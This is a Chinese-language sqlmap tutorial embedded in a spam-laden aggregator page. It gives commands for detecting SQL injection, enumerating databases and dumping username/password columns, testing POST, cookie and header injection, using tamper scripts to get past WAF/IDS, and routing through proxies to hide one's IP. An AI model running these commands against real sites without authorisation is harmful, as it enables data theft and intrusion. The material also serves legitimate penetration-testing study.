当前位置: 首页 > news >正文

博罗企业网站建设seo优化公司信

news 2026/4/7 1:17:48
博罗企业网站建设,seo优化公司信,淘宝网站开始怎么做,温州seo优化安装kali,kali自带sqlmap,在window系统中跟linux系统操作有区别 sqlmap是一款自动化SQL工具,打开kali终端,输入sqlmap,出现以下界面,就说明sqlmap可用。 sqlmap确定目标 一、sqlmap直连数据库 1、直连数据库…

安装kalikali自带sqlmap,在window系统中跟linux系统操作有区别

sqlmap是一款自动化SQL工具,打开kali终端,输入sqlmap,出现以下界面,就说明sqlmap可用

sqlmap确定目标

一、sqlmap直连数据库

1、直连数据库获得旗标

sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner

说明:

  • -d 或 --ds 参数用于指定数据库的连接字符串。
  • mysql://:指定了数据库的类型是MySQL。
  • root:123456:这是数据库的用户名和密码,分别是root和123456。
  • @192.168.137.111:指定了数据库的服务器IP地址,这里是192.168.137.111。
  • :3306:指定了数据库服务器的端口号,MySQL的默认端口是3306。
  • /dbb7:指定了要连接的数据库名称,这里是dbb7。
  • --banner:这个选项指示sqlmap尝试检索并显示数据库的版本信息(即“banner”)。这对于了解目标数据库的类型和版本非常有用,因为不同的数据库类型和版本可能有不同的漏洞和弱点。

2、直连数据库获取用户及权限

sqlmap -d "mysql://root:123456@192.168.137.111:3306/dbb7" -f --banner -users

二、sqlmap实操

1sqlmap完整的get注入

        sqlmap直接对单一的url探测,参数使用-u或者--url

  • 1、检测注入点

        sqlmap -u 'http://xx/?id=1'

  • 2、查看所有数据库

        sqlmap -u 'http://xx/?id=1' --dbs --batch

  • 3、查看当前使用的数据库

        sqlmap -u 'http://xx/?id=1' --current -db --batch

  • 4、查看表名

        sqlmap -u 'http://xx/?id=1' -D 'security' --tables --batch

  • 5、查看字段

        sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns --batch

  • 6、查看数据

        sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump --batch

  • 7、查看字段值

        sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' -C 'username,password' --dump --batch

2、参数说明

指定数据库/表/字段

  • -D 指定目标「数据库」,单/双引号包裹,常配合其他参数使用。
  • -T 指定目标「表」,单/双引号包裹,常配合其他参数使用。
  • -C 指定目标「字段」,单/双引号包裹,常配合其他参数使用。

如:sqlmap -u 'http://xx/?id=1'  -D  'security'  -T  'users'  -C  'username' --dump

2、post请求

sqlmap探测post盲注

步骤一:获取http请求生成test.txt文件

步骤二:使用基于时间技术的sqlmap探测-r

如:sqlmap -r test.txt --technique T -p uname

检测post请求的注入点,使用BP等工具抓包,将http请求内容保存到txt文件中。

-r 指定需要检测的文件,SQLmap会通过post请求方式检测目标。

如:sqlmap -r test.txt

3、cookie注入

--cookie 指定cookie的值,单/双引号包裹。

如:sqlmap -u "http://xx?id=x" --cookie 'cookie'

4sqlmap进行http头注入

指定注入位置进行注入,在保存的文件中,对于参数的修改为*,保存在txt文档中

再进行sqlmap -r /root/test.txt

5sqlmap tamper脚本注入

--tamper 指定绕过脚本,绕过WAF或ids等。

sqlmap内置了很多绕过脚本,在 /usr/share/sqlmap/tamper/ 目录下

如:sqlmap -u 'http://xx/?id=1' --tamper 'uppercase.py'

三、sqlmap其他参数

(1)常见参数
  • --method=GET 指定请求方式(GET/POST)
  • --random-agent 随机切换UA(User-Agent)
  • --user-agent '  ' 使用自定义的UA(User-Agent)
  • --referer '  ' 使用自定义的 referer
  • --threads 10 设置线程数,最高10
(2)性能优化参数
  • --keep-alive 设置持久连接,加快探测速度
  • --null-connection 检索没有body响应的内容,多用于注
  • --thread 最大为10 设置多线程
  • -o开启所有默认性能优化
  • -smart 快速判断,节约时间
  • 设置延迟 --delay 时间。当页面无变化,布尔无真假,从来不报错时用延时注入
  • 设置超时 --timeout 时间
  • 设置重新连接次数--retries 次数
(3)等级参数
  • --batch 自动选择yes。
  • --level=1 执行测试的等级(1-5,默认为1,常用3)
  • --risk=1 风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。
(4)代理参数

隐藏自己的真实ip

  • --proxy http://ip: 端口
  • --proxy -file 使用一个包含多条代理的文件中的代理

http://www.hkea.cn/news/146377/

相关文章:

  • 沈阳做网站最好的公司百度快照怎么删除
  • 设置本机外网ip做网站网站免费制作平台
  • 有什么推荐做简历的网站2024的新闻有哪些
  • 申请做网站 论坛版主惠州seo外包服务
  • 网站照片上传不了域名解析ip
  • 胖小七网站建设2022最新国际新闻10条简短
  • wordpress 网站备份厦门seo外包服务
  • 网站建设及推广培训杭州百度快照优化排名
  • 简单手机网站开发软件关键词排名代发
  • visio画网站开发类图注册域名后怎么建网站
  • 道里网站运营培训北京网络营销咨询公司
  • 目前做网站流行的语言seo关键词排名优化哪家好
  • 长沙营销型网站制作费用seo图片优化
  • 学生诚信档案建设网站seo数据分析
  • 北京住房城乡建设厅网站首页1688官网入口
  • 网站建设需要懂什么软件徐州百度seo排名优化
  • wordpress网站样式网站排名查询
  • 郑州网站建设推销外贸网站推广与优化
  • 当当网站开发系统说明搜索引擎排名google
  • 国外男女直接做的视频网站企业邮箱登录入口
  • 成都可以做网站的公司百度手机助手最新版下载
  • 赤峰网站建设招聘市场营销互联网营销
  • 网站开发后端需要哪些技术友情链接检索数据分析
  • 金华竞价排名 金华企业网站建设常见的网络营销平台有哪些
  • p2p网站开发关键词seo是什么意思
  • 自己免费怎么制作网站合肥今天的最新消息
  • 今日头条新闻10条简短seo网络优化招聘信息
  • 赣州人才网官方网站关键词seo优化软件
  • cad做兼职区哪个网站郑州网络营销公司排名
  • 宁夏银川做网站的公司有哪些网络营销分类